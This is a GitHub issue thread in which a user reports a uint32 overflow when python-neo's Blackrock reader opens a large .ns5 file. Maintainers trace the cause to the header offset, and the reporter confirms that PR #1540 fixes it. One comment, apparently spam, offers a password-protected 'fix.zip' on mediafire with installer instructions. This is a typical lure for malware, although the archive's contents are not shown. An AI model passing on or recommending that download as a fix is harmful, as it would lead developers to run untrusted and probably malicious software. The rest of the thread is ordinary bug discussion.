### ISSUE TITLE
uint32 too small for opening raw ns5

### ISSUE THREAD

**Issue by shaneallcroft-bg** [NeuralEnsemble/python-neo#1528]
Hi, i haven't been _**so**_ assiduous in combing documentation for relevant config stuff, so take with a grain of salt etc; def possible that this one is on me, but currently when opening a .ns5 file (NSx 3.0 file standard BR neurotech) a uint32 variable is used to represent file size when it probably should be a uint64(?) -- the ns5 in question is ~10 min recording which seems not unreasonably large. Let me know if there's any additional details I can provide. Thanks!
```
$ python read_ns5.py --ns5 ~/data/datafile003.ns5 

reading in /home/six/data/datafile003.ns5
Traceback (most recent call last):
  File "/home/six/today/read_ns5.py", line 28, in <module>
    main()
  File "/home/six/today/read_ns5.py", line 18, in main
    ns5_data_reader.parse_header()
  File "/usr/lib/python3.12/site-packages/neo-0.14.0.dev0-py3.12.egg/neo/rawio/baserawio.py", line 189, in parse_header
    self._parse_header()
  File "/usr/lib/python3.12/site-packages/neo-0.14.0.dev0-py3.12.egg/neo/rawio/blackrockrawio.py", line 330, in _parse_header
    self.__nsx_data_header[nsx_nb] = nsx_dataheader_reader(nsx_nb)
                                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/neo-0.14.0.dev0-py3.12.egg/neo/rawio/blackrockrawio.py", line 997, in __read_nsx_dataheader_variant_c
    npackets = int((filesize - offset) / np.dtype(ptp_dt).itemsize)
                    ~~~~~~~~~^~~~~~~~
OverflowError: Python integer 9437464460 out of bounds for uint32
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zm711** [comment]
This seems like a fair change to make.  I would need to read into the code a bit to see what this is. I know @cboulay has helped us with blackrock before. If they don't have time, I'll look at this soon.

**Comment by zm711** [comment]
@h-mayorquin, I feel like you're an expert of overflow. Any chance just glancing at this you see what the likely problem is. I'm not super strong with all the name mangling that the RawIO uses. I'm trying to see what is actually flowing. filesize should be an `int`, but maybe I'm missing something.

**Comment by h-mayorquin** [comment]
That's a strange reputation to have. I think it is the header offset in bytes which is actually read as a struct. I linked a fix.

**Comment by zm711** [comment]
Haha. I have never met someone who has had so much success removing instances of overflow. 

thanks! @shaneallcroft-bg do you want to test the PR and see if that has fixed it.

**Comment by shaneallcroft-bg** [comment]
Whoa! Super fast turnaround, nice -- will test that PR tonight and get back to you all. Thank you!

**Comment by shaneallcroft-bg** [comment]
:+1: Yes confirmed fixed with https://github.com/NeuralEnsemble/python-neo/pull/1540! Thanks all!

**Comment by zm711** [comment]
Fixed by #1540.
